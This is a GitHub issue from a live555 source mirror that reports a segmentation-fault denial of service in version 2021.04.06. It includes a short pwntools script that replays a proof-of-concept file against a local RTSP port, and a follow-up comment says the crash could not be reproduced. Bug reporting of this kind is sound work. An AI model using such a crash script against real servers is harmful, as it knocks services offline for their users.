rgaufman / live555

A mirror of the live555 source code.
GNU Lesser General Public License v3.0

There is a bug which can lead to DoS in live555 (version 2021.04.06) due to access to illegal addresses. #33

Open 3vi1d0g opened 3 years ago

3vi1d0g commented 3 years ago

When I send my PoC, the program receives signal SIGSEGV (segmentation fault). It seems that the variable "env" is not initialized.

from pwn import *
p = remote("127.0.0.1", 8554)
context.log_level="DEBUG"

f = open("poc.raw")
lines = f.read()
for line in lines.split("\r\n\r\n"):
    p.send(line+"\r\n\r\n")
print ("Fin!\n")

I use the LLVM compiler to compile the project.

poc.zip

log.log

3vi1d0g commented 3 years ago

My debugger log is log.log

kuiba3 commented 2 years ago

I failed to reproduce the crash in version bbee4ed68a27056671875b845f84d90a01328788 2020.6.10. I can't find version 2021.04.06. Can you provide the download link for version 2021.04.06?